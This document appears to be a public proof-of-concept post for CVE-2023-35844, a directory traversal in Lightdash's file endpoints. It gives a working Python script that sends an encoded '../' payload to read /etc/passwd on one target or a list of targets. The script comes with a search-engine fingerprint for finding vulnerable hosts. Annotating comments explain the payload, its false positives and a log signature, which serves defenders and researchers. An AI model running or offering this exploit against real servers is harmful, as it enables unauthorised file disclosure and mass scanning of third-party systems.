packages/backend/src/routers in Lightdash before 0.510.3 has insecure file endpoints, e.g., they allow directory traversal and do not ensure that an intended file extension (.csv or .png) is used.
URL - https://github.com/Szlein/CVE-2023-35844
directory traversal and do not ensure that an intended file extension (.csv or .png) is used.
Python:
import requests
import sys
# Banner printed on import/run: usage lines (-u single URL, -f file of URLs),
# a search-engine fingerprint hint, and the author tag. ANSI escapes (\033[36m / \033[0m)
# only colour the text; nothing here is read back by the code.
print('+------------------------------------------')
print('+ \033[36m使用格式: python3 CVE-2023-35844.py -u https://x.x.x.x \033[0m')
print('+ \033[36m使用格式: python3 CVE-2023-35844.py -f xxx.txt \033[0m')
print('+ \033[36m指纹特征: fofa: "Lightdash" \033[0m')
print('+ \033[36mauther >>> Lsec \033[0m')
print('+------------------------------------------')
# Request path appended to every target base URL by url_poc / list_url_poc.
# It addresses the slack-image file endpoint described above (Lightdash < 0.510.3),
# with "../" segments percent-encoded as %2F..%2F; the endpoint neither normalises
# the path nor enforces the expected .png extension. For defenders: a request to
# this route containing encoded ".." segments is a direct log/WAF signature, and
# upgrading to 0.510.3 or later removes the traversal.
payload = "/api/v1/slack/image/slack-image%2F..%2F..%2F..%2Fetc%2Fpasswd"
# Check a single base URL.
def url_poc(url: str) -> None:
    """Send the traversal request to *url* + payload and print a hit.

    Args:
        url: Base URL of the target (scheme + host, e.g. "https://x.x.x.x");
            it is concatenated directly with the module-level ``payload``,
            so a trailing "/" on *url* produces a double slash.

    Side effects:
        Prints a Chinese "vulnerable" message followed by the full response
        body when the heuristic matches. Nothing is returned.

    Raises:
        requests.exceptions.RequestException on connection/TLS failures —
        there is no try/except here, so one bad host aborts the run.
    """
    domain = url + payload
    # Silence the InsecureRequestWarning that verify=False would otherwise emit.
    requests.packages.urllib3.disable_warnings()
    # TLS certificate verification is disabled: the response may come from any
    # host presenting any certificate, and there is no timeout, so a
    # non-responding target blocks indefinitely.
    resp = requests.get(domain,verify=False)
    # Detection heuristic only: any response body containing the substring
    # "root" (an error page, a dashboard, a login form) is reported as a hit,
    # so a positive here needs manual confirmation.
    if "root" in resp.text:
        print(url+"存在漏洞")
        print(resp.text)
def list_url_poc(urls: str) -> None:
    """Run the same check as url_poc for every line of a text file.

    Args:
        urls: Path to a file with one base URL per line. The file is opened
            with the platform default encoding (no ``encoding=`` argument).

    Side effects:
        Prints a hit message and the response body for each matching line.

    Raises:
        OSError if the file cannot be opened; requests exceptions propagate
        from any single request and stop the whole loop.
    """
    with open(urls, "r") as f:
        # readlines() keeps the trailing newline on each entry; only the
        # request URL is stripped. Blank lines become a request to ``payload``
        # alone (a relative path), which requests rejects with an exception.
        for url in f.readlines():
            domain = (url.strip() + payload)
            # Re-issued per iteration; harmless but only needed once.
            requests.packages.urllib3.disable_warnings()
            # verify=False and no timeout — same caveats as in url_poc.
            resp = requests.get(domain, verify=False)
            # Substring heuristic; prone to false positives on any page
            # that happens to contain "root".
            if "root" in resp.text:
                # ``url`` is the unstripped line here, so its newline splits
                # the message across two lines.
                print(url + "存在漏洞")
                print(resp.text)
if __name__ == '__main__':
    # Exactly one flag and one value are accepted: "-u <url>" or "-f <file>".
    if len(sys.argv) != 3:
        print("Usage: python CVE-2023-35844.py -u <url>")
        # NOTE: -f actually takes a file path (see list_url_poc), although
        # this usage line says <url>.
        print("Usage: python CVE-2023-35844.py -f <url>")
        sys.exit(1)
    if sys.argv[1] == "-u":
        url = sys.argv[2]
        url_poc(url)
    elif sys.argv[1] == "-f":
        urls = sys.argv[2]
        list_url_poc(urls)
    # Any other first argument falls through silently with exit status 0.
URL - https://github.com/Szlein/CVE-2023-35844